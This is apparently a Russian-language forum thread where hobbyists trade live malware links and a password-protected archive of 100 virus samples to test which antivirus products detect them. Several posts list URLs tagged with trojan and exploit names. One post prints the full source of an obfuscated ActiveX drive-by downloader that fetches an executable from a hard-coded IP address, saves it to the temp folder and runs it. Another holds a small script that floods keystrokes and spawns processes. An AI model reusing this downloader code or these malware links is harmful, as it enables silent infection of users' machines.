Рун

он имел в виду хорошим, а не отличным.

Ок.



(чето я тоже никак вирус не могу подцепить))

Я тебе говорил. Ну, ладно. На:



Trojan.Downloader.INService-33: http://ddl-help.info/readme.exe

Exploit.CVE_2007_0038: http://trans-msk.ru/sVIqtGUAYNMJEZY.AswtCRdLtOcaXSN

Exploit.MS05-013: http://www.yellowpress.ru/

Exploit.MS05-013: http://www.yellowpress.ru/?

Trojan.Downloader-2388: http://www.usuc.us/2/stuff/to_peakclick.html

VBS.Psyme-8: http://werew0lf.net/soft/get.php

Exploit.MS05-013: http://www.yellowpress.ru/

Exploit.MS05-013: http://www.yellowpress.ru/?

Trojan.Downloader-2388: http://www.usuc.us/2/stuff/to_peakclick.html

VBS.Psyme-8: http://werew0lf.net/soft/get.php



- аваст молчит

ЧЕМ ЛЕЧИИТЬСЯЯЯЯЯ %)

Шилов Только по первой ссылке нашел вирус %)

~Co0L~ а я еще и по второй. Пошливместе что ли сносить винду?))

Шилов, Каспер сцуко скачать не дает)))

Рун Да, надо бы

Среди той сотни вирусов, Аваст пропустил 3 штуки.

Один из ник jsсriрt файл:



var WshShell = Wsсriрt.CreateObject("Wsсriрt.Shell");

WshShell.AppActivate("1.js");

WshShell.sendKeys("{a 1000}");

WshShell.run("1.js");



Чето я не понимаю, чем он опасен %)

ол

Сори, братцы. На елупеджес ссылки ессно левые в лог легли - по "http://www.yellowpress.ru/?" видно. Хвост не записался.



При переходе на http://www.usuc.us/2/stuff/to_peakclick.html у вас новое окно выскакивает? У меня - да. А не должно. Касперский провафлил.



На http://werew0lf.net/soft/get.php - эксплойт. Но он модифицированый. Не все "крутые" антивирусы увидят - осторожнее. Его бы проверить надо - может он уже и не вредоносный.

А там точно сотня вирусов? У меня чето Каспер взбесился))) Я смотрю там большиство именно вирусов под ДОС. Обидно блин.

При переходе на http://www.usuc.us/2/stuff/to_peakclick.html у вас новое окно выскакивает? У меня - да. А не должно. Касперский провафлил.

У меня он просто редирект на какой-то бобруйский поисковик делает и все))

Рун

Чето я не понимаю, чем он опасен

Ага.

Сэр Дьявол

Жесть. Как смог?



~Co0L~

ие6?

Шилов Если запущу системя сильно крякнется или не сильно?

При переходе на http://www.usuc.us/2/stuff/to_peakclick.html у вас новое окно выскакивает? У меня - да. А не должно. Касперский провафлил.

А ты уверен что там действительно что то есть?)))

Сэр Дьявол

Жесть. Как смог?

Распаковал содержимое твоего архива))) В папку к моим собранным вирусам (штук 15)

Рун

Да куда же она крякнется то?! Код то смешной. Цикл, сильная загрузка процессора, трудно прибить в диспетчере задач. Все.



Сэр Дьявол

Сам факт нового окна, это уже "что-то есть".



Распаковал содержимое твоего

Хм... нет, у меня нормально все. . Кав 6?

Хм... нет, у меня нормально все. . Кав 6?

Из скрина не видно?

Сам факт нового окна, это уже "что-то есть".

Да, просто скрипт, редиректящий на другую страницу. Ничего опасного в этом не вижу.

Шилов ие6)

Сэр Дьявол

Из скрина не видно?

Неа. Там же не слова "о программе". Не знаю. Правда. Может накрутил чего. Лог выложи.



Ничего опасного в этом не вижу.

Та же история, что с джавой - конструкция, которая, как минимум ничего хорошего не делает. Банальная ситуация. У тебя открыто окон двадцать ие. Одним "процессом". Ты окрываешь это окно и весь твой десктоп превращается в непрерывано генерящиеся окна. Мелочь, а не приятно. Процесс, ты, конечно, прибьешь, но старые окна тоже лягут. Тебе оно надо?

~Co0L~

Хм. Щас востановлюсь из образа - посмотрим. Ожидайте.

Неа. Там же не слова "о программе". Не знаю. Правда. Может накрутил чего. Лог выложи.

На заголовок пробовал посмотреть?))) Вот отчет - http://ifolder.ru/1832036 тока читать заипетесь...

Та же история, что с джавой - конструкция, которая, как минимум ничего хорошего не делает. Банальная ситуация. У тебя открыто окон двадцать ие. Одним "процессом". Ты окрываешь это окно и весь твой десктоп превращается в непрерывано генерящиеся окна. Мелочь, а не приятно. Процесс, ты, конечно, прибьешь, но старые окна тоже лягут. Тебе оно надо?

Чето по это сцылке ятакого не обнаружил. Может исходники выложишь, доказывающие это?

Сэр Дьявол

читать заипетесь...

Красава! Ты че прислал?! Очищенный лог сканера где?



Может исходники выложишь, доказывающие это?



<sсriрt language="javasсriрt">

var url="http://81.95.144.76/ttf/sss.php?a=8&c=8";



var bb1470053174ff = url;

function CreateO(o, n) {

var r = null;



try { eval('r = o.CreateObject(n)') }catch(e){}



if (! r) {

try { eval('r = o.CreateObject(n, "")') }catch(e){}

}



if (! r) {

try { eval('r = o.CreateObject(n, "", "")') }catch(e){}

}



if (! r) {

try { eval('r = o.GetObject("", n)') }catch(e){}

}



if (! r) {

try { eval('r = o.GetObject(n, "")') }catch(e){}

}



if (! r) {

try { eval('r = o.GetObject(n)') }catch(e){}

}



return(r);

}



function Go(a) {

var s = CreateO(a, "WSc"+"rip"+"t.Sh"+"ell");

var o = CreateO(a, "ADO"+"DB.Str"+"eam");

var e = s.Environment("Process");



var bb1117811560ff = null;

var bin = e.Item("TEMP")+ "\\" + "rf309861820mm.exe";

var bb851991999ff;



try { bb1117811560ff=new XMLHttpRequest(); }

catch(e) {

try { bb1117811560ff = new ActiveXObject("Micr"+"osoft.XMLH"+"TTP"); }

catch(e) {

bb1117811560ff = new ActiveXObject("MS"+"XML2.Serv"+"erXMLH"+"TTP");

}

}



if (! bb1117811560ff) return(0);



bb1117811560ff.open("GET", bb1470053174ff, false)

bb1117811560ff.send(null);

bb851991999ff = bb1117811560ff.responseBody;



o.Type = 1;

o.Mode = 3;

o.Open();

o.Write(bb851991999ff);

o.SaveToFile(bin, 2);



s.Run(bin,0);

}



var i = 0;

var bb31082744ff = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);



while (bb31082744ff[i]) {

var a = null;



if (bb31082744ff[i].substring(0,1) == '{') {

a = document.createElement("object");

a.setAttribute("classid", "clsid:" + bb31082744ff[i].substring(1, bb31082744ff[i].length - 1));

} else {

try { a = new ActiveXObject(bb31082744ff[i]); } catch(e){}

}



if (a) {

try {

var b = CreateO(a, "WSc"+"ript.She"+"ll");

if (b) {

Go(a);

//return(0);

}

} catch(e){}

}

i++;

}









</sсriрt>

<sсriрt> - написано наполовину по русски.

Рун

Красава! Ты че прислал?! Очищенный лог сканера где?

Ок, вот результаты скана чисто твоего распакованного архива при отключенном мониторе. http://ifolder.ru/1835546



<sсriрt language="javasсriрt">

var url="http://81.95.144.76/ttf/sss.php?a=8&c=8";



Так что давай исходники, которые по той ссылке, которую пропускает Каспер.

Сэр Дьявол

Обещал не ругаться... Сеэ Дьявол, ты сам то свои логи смотрел? Выложенный мной на рапиду файл содержит 7 папок и 100 файлов. Рассортированы они по принципу заражения - червяки, трояны, эксплойты... У тебя же в логах куча досовых вирусов рассортированных по алфавиту. Где ты их взял - я не знаю.



Так что давай исходники

Поздняк. "Sorry! You IP is blocked". Хороший сайтик. Умный.

Где ты их взял - я не знаю

Из твоего иопанного архива. Еще раз перекачай и проверь что у тебя там лежит. Пароль на архив 123. При разархивировании пявляется куча папок с назниями типа a,b,c,....

Сэр Дьявол

Вот мой комент. http://diary.ru/~techsupport/?comme...78154#111453418

Вот линк из этого комента http://rapidshare.com/files/21016766/100_vir.rar

Размер файла 1.2, количество файлов 100.

Плять. Нашел. 2 почти одинаковых по названию архива в одной папке это зло(((

хорошо что они еще не в линуксе, тама можно только раскладкой обойтись))